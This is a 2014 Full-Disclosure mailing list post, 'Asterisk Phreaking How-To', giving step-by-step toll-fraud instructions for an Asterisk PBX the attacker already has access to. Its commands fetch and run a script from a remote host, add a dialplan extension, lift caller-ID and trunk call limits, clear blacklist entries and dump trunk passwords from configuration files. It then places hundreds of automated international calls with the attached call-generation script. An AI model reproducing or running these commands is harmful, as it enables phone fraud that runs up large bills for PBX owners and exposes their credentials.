| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 29 Jun 2014 04:06:03 +0700
From: Akra Macha <akra1399@...il.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com, submit@...sec.com
Subject: [FD] Asterisk Phreaking How-To
Asterisk Phreaking How-To
by Akramachamarei
This file shows how to use asterisk to make international calls. All is
done with command line client. A graphical client like Zoiper can be used
additionally to verify that the endpoint number can be reached.
Required is access to the pbx as asterisk user.
First execute
asterisk -rx 'sip show peers'
sample output
Name/username Host Dyn Forcerport ACL Port Status Description
1741240560 10.200.7.157 N 5060 OK (49 ms)
201/201 (Unspecified) D N A 0 UNKNOWN
202/202 (Unspecified) D N A 0 UNKNOWN
203/203 (Unspecified) D N A 0 UNKNOWN
204/204 (Unspecified) D N A 0 UNKNOWN
205 (Unspecified) D N A 0 UNKNOWN
STXSIP 10.200.7.157 N 5060 OK (44 ms)
...to view the active peers connected. The peers at top show the caller
ids we will use for the auto dial call file. At bottom the trunks are
listed, there are two types of trunks, inbound and outbound. We are
interested in the outbound trunks to place calls.
We will use the shell script at the end of this tutorial to place automated
calls.
Now we have to fetch the call.sh script to the asterisk pbx.
Command
wget -O /tmp/c.sh <ip>/call.sh;chmod a+x /tmp/c.sh;/tmp/c.sh add;asterisk \
-rx 'dialplan reload';asterisk -rx 'manager reload'
...will download call.sh from <ip>, save it to /tmp/c.sh. Then it will call
the add function of the shell script to add a new extension to /etc/
asterisk/extensions.conf.
the new extension is
[calloutnow]
echo "exten => 100,1,Wait(999999999)
which just waits until the call is hung up. then the command reloads the
dialplan and manager to activate the new extension.
now we are ready to make calls.
this is the command layout
/tmp/c.sh slow <number of calls> <callerid> NULL <number of seconds between
calls> <delay before the calls are placed> <trunk with destination number>
here is an example command to place a test call
/tmp/c.sh slow 1 205 NULL 15 1 SIP/STXSIP/00449999999999
this command will execute 1 call from callerid 205 at an interval of 15
seconds to trunk STXSIP and destination number 00449999999999. Normally
it's ok to use the 00 prefix for the calls, I haven't seen a pbx that
doesn't change the prefix automatically.
to see if the place succeeds we look into the asterisk log file located at
/var/log/asterisk/full
Command
tail -30 /var/log/asterisk/full
...will show log like
[2014-02-14 07:47:05] VERBOSE[30266] pbx_spool.c: -- Attempting call on
SIP/STXSIP/00449999999999 for 100@...loutnow3:1 (Retry 1)
[2014-02-14 07:47:05] VERBOSE[30266][C-00003930] netsock2.c: == Using SIP
RTP TOS bits 184
[2014-02-14 07:47:05] VERBOSE[30266][C-00003930] netsock2.c: == Using SIP
RTP CoS mark 5
[2014-02-14 07:47:16] VERBOSE[30266][C-00003930] pbx.c: -- Executing [
100@...loutnow3:1] Wait("SIP/STXSIP-00003941", "999999999") in new stack
this indicates a successful connection to the number. We can see this
by the line Wait("SIP/STXSIP-00003941", "999999999") entry.
If the log file still shows this line after some seconds and not an error
that it hung up the call then we can be sure that the line calls stable.
After we have assured the call goes to the destination we can place more
calls to the number.
Command
/tmp/c.sh slow 200 205 NULL 15 1 SIP/STXSIP/00449999999999
calls the destination 200 times with an interval delay of 15 seconds.
we always can view the call queue is running by looking into the asterisk
outgoing spool path /var/spool/asterisk/outgoing.
Simply with
ls -la /var/spool/asterisk/outgoing
We can stop upcoming calls by deleting the queue.
Simply with
rm /var/spool/asterisk/outgoing/*
Individual calls can be hung up with
asterisk -rx 'core show channels concise'
this will show the channel name of the call at the left side and
asterisk -r -x 'channel request hangup <channel name>'
hangs up the call.
Some asterisks have limits configured. There are two types of limits,
limits bound to the callerid and limits for the maximum outbound calls for
the trunk.
we can see if there are limits for the callerid with
asterisk -rx 'sip show inuse'
the limit column with value 2147483647 means unlimited calls.
we can see the outbound trunk limit with
grep OUTMAXCHANS /etc/asterisk/*
empty entries mean unlimited outbound calls for the asterisk pbx we have
access to, it does not show and we cannot manipulate the outbound call
limit of the trunk peer.
we can set limits for callerids by
asterisk -rx "database put AMPUSER <callerid>/concurrency_limit 9999999"
will set <callerid> concurrency call limit to a high value.
we can set outbound trunk limits with the sed command to change
extensions_additonal.conf, you should backup this file before doing so.
sed -i.bak 's/OUTMAXCHANS_1 =\ 5/OUTMAXCHANS_1 =/g' /etc/asterisk/ \
extensions_additional.conf
asterisk -rx 'dialplan reload';asterisk -rx 'manager reload'
these commands will change OUTMAXCHANS_1 setting from 5 to unlimited and
reload asterisk dialplan and manager.
finally when a callerid is blacklisted by the pbx we can recover the
callerid with
asterisk -rx 'database del blacklist <callerid>'
one useful command is
cat /etc/asterisk/sip_additional.conf
it dumps callerids and trunks with passwords.
attached is the call.sh script for your pleasure.
Happy Calls and Stay safe!
#!/bin/bash
#***************************************************************#
# generateCalls.sh #
# written by: Sam Rausch #
# samrausch@...il.com #
# version 0.1 #
# written October 21, 2011 #
#***************************************************************#
# #
# assumes presence of Asterisk already configured #
# + with a spool path at /var/spool/asterisk/outgoing #
# + with an 'autodialer' context configured as follows #
# #
# [autodialer] #
# exten => 100,1,Playback(some-foo-goes-here) #
# exten => 100,2,Wait(1) #
# exten => 100,3,Playback(goodbye) #
# exten => 100,4,Hangup #
# #
# this script has two functions #
# + fast() will generate calls at a fixed $callsPerSecond rate #
# + slow() will generate calls with a fixed $intercallDelay #
# #
# if you find this script useful, consider dropping #
# me a note to say thanks. i don't want beer money #
# and i don't have an Amazon wishlist ;-) #
# if you're inclined to compensate me monetarily, #
# please make a donation to: #
# #
# -= http://www.donors1.org/contribute =- #
# #
# this script is free to redistribute as long as #
# everything above remains intact #
# #
# if you remove my name and take credit for the script #
# rabid space cats will come to your house and #
# speedhump your legs until you beg for mercy... #
# ...please don't make me send my space cats #
# #
#***************************************************************#
asteriskSpoolPath=/var/spool/asterisk/outgoing
add ()
{
echo "[calloutnow]" >> /etc/asterisk/extensions.conf
echo "exten => 100,1,Wait(999999999)" >> /etc/asterisk/extensions.conf
echo ok
exit 0
}
#-----------------------------------------------------------------------------#
# fast ()
#
# generates .call files for use by Asterisk
#
# Parameters: numcalls, callingParty, calledParty, callsPerSecond,
startDelay #
#-----------------------------------------------------------------------------#
fast ()
{
# prompt for values if not given on the CLI
if [ -z "$2" ]
then
echo
echo
"<---------------------------------------------------------------------------->"
echo "Oops, I don't know enough to place your calls."
echo "Please tell me more about what you'd like to do"
echo "using the following format:"
echo
echo "generateCalls <numCalls> <callingParty> <calledParty>
<callsPerSecond> <startDelay>"
echo
echo "<numCalls> = total number of calls to generate"
echo "<callingParty> = phone number originating the calls expressed as
xxxxxxxxxx"
echo "<calledParty> = phone number terminating the calls expressed as
xxxxxxxxxx"
echo "<callsPerSecond> = number of calls placed per second, if the same as
echo " <numCalls> then all calls will be placed
simultaneously"
echo "<startDelay> = delay after executing script for calls to start
expressed in seconds
echo
echo "I'll be creating your .call files in $(pwd)"
echo "then moving them to the default Asterisk spool path"
echo "/var/spool/asterisk/outgoing/"
echo
echo "If you'ld like them to go somewhere else, you'll need to"
echo "edit this script"
echo
"<---------------------------------------------------------------------------->"
echo
exit 0
else
let numCalls=$1
callingParty="$2"
calledParty="$3"
let callsPerSecond=$4
let startDelay=$5
channel="$6"
fi
# Output the values for visual confirmation
echo "You want to make $numCalls calls"
echo "You want to call from $callingParty"
echo "You want to call to $calledParty"
echo "You want to place $callsPerSecond calls per second"
echo "You want to wait $startDelay seconds before the first call"
echo "You want to call from channel $channel"
echo
# Generate the .call files
let callsPerSecondReference=$callsPerSecond
let second=$startDelay
while [ "$numCalls" -gt 0 ]
do
let callsPerSecond=$callsPerSecondReference
while [ "$callsPerSecond" -gt 0 ]
do
echo "Channel: $channel" > testcall$numCalls.call
echo "CallerID: \"CLI\"<$callingParty>" >> testcall$numCalls.call
echo "Context: calloutnow" >> testcall$numCalls.call
echo "Extension: 100" >> testcall$numCalls.call
echo "Priority: 1" >> testcall$numCalls.call
touch -r testcall$numCalls.call -d "+$second sec" testcall$numCalls.call
# touch -t "$month$day$hour$minute.$second" testcall$numCalls.call
let "numCalls -= 1"
let "callsPerSecond -= 1"
done
let "second += 1"
done
# Move the .call files to the default Asterisk outgoing path
echo "Your calls will start in $startDelay seconds"
mv *.call /var/spool/asterisk/outgoing/
# Remind the user to answer their phone
echo Answer your phone!!!
# Now go away...
exit 0
}
#-----------------------------------------------------------------------------#
# slow ()
#
# generates .call files for use by Asterisk
#
# Parameters: numcalls, callingParty, calledParty, intercallDelay,
startDelay #
#-----------------------------------------------------------------------------#
slow ()
{
# prompt for values if not given on the CLI
if [ -z "$2" ]
then
echo
echo
"<---------------------------------------------------------------------------->"
echo "Oops, I don't know enough to place your calls."
echo "Please tell me more about what you'd like to do"
echo "using the following format:"
echo
echo "generateCalls <numCalls> <callingParty> <calledParty>
<intercallDelay> <startDelay>"
echo
echo "<numCalls> = total number of calls to generate"
echo "<callingParty> = phone number originating the calls expressed as
xxxxxxxxxx"
echo "<calledParty> = phone number terminating the calls expressed as
xxxxxxxxxx"
echo "<intercallDelay> = number of seconds between calls"
echo "<startDelay> = delay after executing script for calls to start
expressed in seconds"
echo " You'll want to add 10 sec for every 1,000 files you
want to generate"
echo "I'll be creating your .call files in $(pwd)"
echo "then moving them to the default Asterisk spool path"
echo "/var/spool/asterisk/outgoing/"
echo
echo "If you'ld like them to go somewhere else, you'll need to"
echo "edit this script"
echo
"<---------------------------------------------------------------------------->"
echo
exit 0
else
let numCalls=$1
callingParty="$2"
let intercallDelay=$3
let startDelay=$4
channel="$5"
fi
# Output the values for visual confirmation
echo "You want to make $numCalls calls"
echo "You want to call from $callingParty"
echo "You want to call to $channel"
echo "You want to wait $intercallDelay seconds between calls"
echo "You want to wait $startDelay seconds before the first call"
echo
# Generate the .call files
let second=$startDelay
while [ "$numCalls" -gt 0 ]
do
echo "Channel: $channel" > testcall$numCalls.call
echo "CallerID: \"CLI\"<$callingParty>" >> testcall$numCalls.call
echo "Context: calloutnow" >> testcall$numCalls.call
echo "Extension: 100" >> testcall$numCalls.call
echo "Priority: 1" >> testcall$numCalls.call
touch -r testcall$numCalls.call -d "+$second sec" testcall$numCalls.call
let "numCalls -= 1"
let second=$second+$intercallDelay
done
# Move the .call files to the default Asterisk outgoing path
echo "Your calls will start in $startDelay seconds"
mv *.call /var/spool/asterisk/outgoing/
# Remind the user to answer their phone
echo Answer your phone!!!
# Now go away...
exit 0
}
help ()
{
echo
echo
echo "****************************************************************"
echo
echo " this script has two functions "
echo " + fast() will generate calls at a fixed callsPerSecond rate "
echo " + slow() will generate calls with a fixed intercallDelay "
echo
echo " if you find this script useful, consider dropping "
echo " me a note to say thanks. i don't want beer money "
echo " and i don't have an Amazon wishlist ;-) "
echo " if you're inclined to compensate me monetarily, "
echo " please make a donation to: "
echo " "
echo " -= http://www.donors1.org/contribute =- "
echo " "
echo " this script is free to redistribute as long as "
echo " everything above remains intact "
echo " "
echo " if you remove my name and take credit for the script "
echo " rabid space cats will come to your house and "
echo " speedhump your legs until you beg for mercy... "
echo " ...please don't make me send my space cats "
echo
echo "****************************************************************"
echo
echo "generateCalls fast <numCalls> <callingParty> <calledParty>
<callsPerSecond> <startDelay>"
echo " numCalls = total number of calls to generate"
echo " callingParty = phone number originating the calls expressed as
xxxxxxxxxx"
echo " calledParty = phone number terminating the calls expressed as
xxxxxxxxxx"
echo " callsPerSecond = number of calls placed per second, if the same
as"
echo " numCalls then all calls will be placed
simultaneously"
echo " startDelay = delay after executing script for calls to start
expressed in seconds"
echo
echo
"-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
echo
echo "generateCalls slow <numCalls> <callingParty> <calledParty>
<intercallDelay> <startDelay>"
echo " numCalls = total number of calls to generate"
echo " callingParty = phone number originating the calls expressed as
xxxxxxxxxx"
echo " calledParty = phone number terminating the calls expressed as
xxxxxxxxxx"
echo " intercallDelay = number of seconds between calls"
echo " startDelay = delay after executing script for calls to start
expressed in seconds"
echo " You'll want to add 10 sec for every 1,000 files
you want to generate"
echo
echo
exit 0
}
# need this line to call the function passed from the CLI
# because bash is too stupid to let me define functions
# locally to override what's in .bashrc
"$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
exit 0
View attachment "phreak.txt" of type "text/plain" (17536 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists